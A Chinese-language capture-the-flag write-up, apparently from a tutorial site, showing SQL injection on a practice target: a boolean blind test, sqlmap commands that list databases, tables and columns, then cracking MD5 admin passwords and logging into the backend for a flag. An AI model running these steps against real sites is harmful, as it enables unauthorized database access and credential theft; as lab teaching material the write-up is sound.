目錄
- 1.發(fā)現(xiàn)此網(wǎng)址可能存在sql注入漏洞,我們進(jìn)行sql盲注入測試一下是否存在漏洞。
- 2.現(xiàn)在拿出我們的kali工具,sqlmap進(jìn)行注入測試。
- 3.可以看到存在注入漏洞,掃到了5個(gè)數(shù)據(jù)庫。要獲取管理員用戶密碼,我們可以先從stormgroup注入。查看stormgroup這個(gè)數(shù)據(jù)庫存在的表單
- 4.接下來查一下member中存在哪些列。
- 5.上一步可以看到,name,password 是不是很熟悉。ok接下來我們開始獲取這兩列的數(shù)據(jù)。
- 6.可以看到password是經(jīng)過md5加密,接下來我們把他解密。這里推薦給大家我自己收集的多種解密網(wǎng)址:解密網(wǎng)址大全點(diǎn)擊這里
- 7.now! 密碼已經(jīng)呈現(xiàn)在我們眼前?。。?!找到后臺地址進(jìn)行登錄。
- 8.END 登錄成功,拿到flag,提交。Gameover !
- 總結(jié)
1.發(fā)現(xiàn)此網(wǎng)址可能存在sql注入漏洞,我們進(jìn)行sql盲注入測試一下是否存在漏洞。
地址欄輸入 and 1=1 發(fā)現(xiàn)頁面正常顯示。
再次輸入and 1=2 頁面出現(xiàn)錯(cuò)誤,說明該頁面可能存在sql注入漏洞
2.現(xiàn)在拿出我們的kali工具,sqlmap進(jìn)行注入測試。
sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 --dbs
3.可以看到存在注入漏洞,掃到了5個(gè)數(shù)據(jù)庫。要獲取管理員用戶密碼,我們可以先從stormgroup注入。查看stormgroup這個(gè)數(shù)據(jù)庫存在的表單
sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 -D stormgroup -tables
4.接下來查一下member中存在哪些列。
sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 -D stormgroup -T member --columns
5.上一步可以看到,name,password 是不是很熟悉。ok接下來我們開始獲取這兩列的數(shù)據(jù)。
6.可以看到password是經(jīng)過md5加密,接下來我們把他解密。這里推薦給大家我自己收集的多種解密網(wǎng)址:解密網(wǎng)址大全點(diǎn)擊這里
7.now! 密碼已經(jīng)呈現(xiàn)在我們眼前!?。?!找到后臺地址進(jìn)行登錄。
8.END 登錄成功,拿到flag,提交。Gameover !
總結(jié)
本篇文章就到這里了,希望能給你帶來幫助,也希望您能夠多多關(guān)注腳本之家的更多內(nèi)容!
您可能感興趣的文章:- MyBatis 中 SqlMapConfig 配置文件詳解
- Windows下Sqlmap環(huán)境安裝教程詳解
- MyBatis直接執(zhí)行SQL的工具SqlMapper
- Mybatis中SqlMapper配置的擴(kuò)展與應(yīng)用詳細(xì)介紹(1)
- 使用XSD校驗(yàn)Mybatis的SqlMapper配置文件的方法(2)